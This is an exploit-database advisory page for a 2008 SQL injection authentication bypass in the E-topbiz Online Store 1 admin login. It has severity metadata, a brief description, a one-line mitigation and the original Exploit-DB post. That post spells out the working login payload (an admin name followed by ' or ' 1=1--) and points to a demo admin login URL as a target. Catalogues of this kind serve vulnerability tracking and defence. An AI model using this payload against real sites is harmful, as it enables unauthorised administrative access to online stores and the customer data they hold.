header-logo
Suggest Exploit
vendor:
E-topbiz Online Store 1
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: E-topbiz Online Store 1
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:e-topbiz:e-topbiz_online_store_1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability

An authentication bypass vulnerability exists in E-topbiz Online Store 1. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. This is achieved by supplying a specially crafted username and password. The username should be the real admin name followed by ' or ' 1=1 and the password should be ZoRLu. For demo, the username should be admin ' or ' 1=1-- and the password should be ZoRLu.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability

author: ZoRLu  msn: trt-turk@hotmail.com

Home: www.z0rlu.blogspot.com

N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : (   ( bIktIm a.q )

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin 


for demo: 

http://e-topbiz.com/trafficdemos/store1/admin/login.php

username: admin ' or ' 1=1--

password: ZoRLu


thanks: str0ke & yildirimordulari.org  &  darkc0de.com

# milw0rm.com [2008-11-07]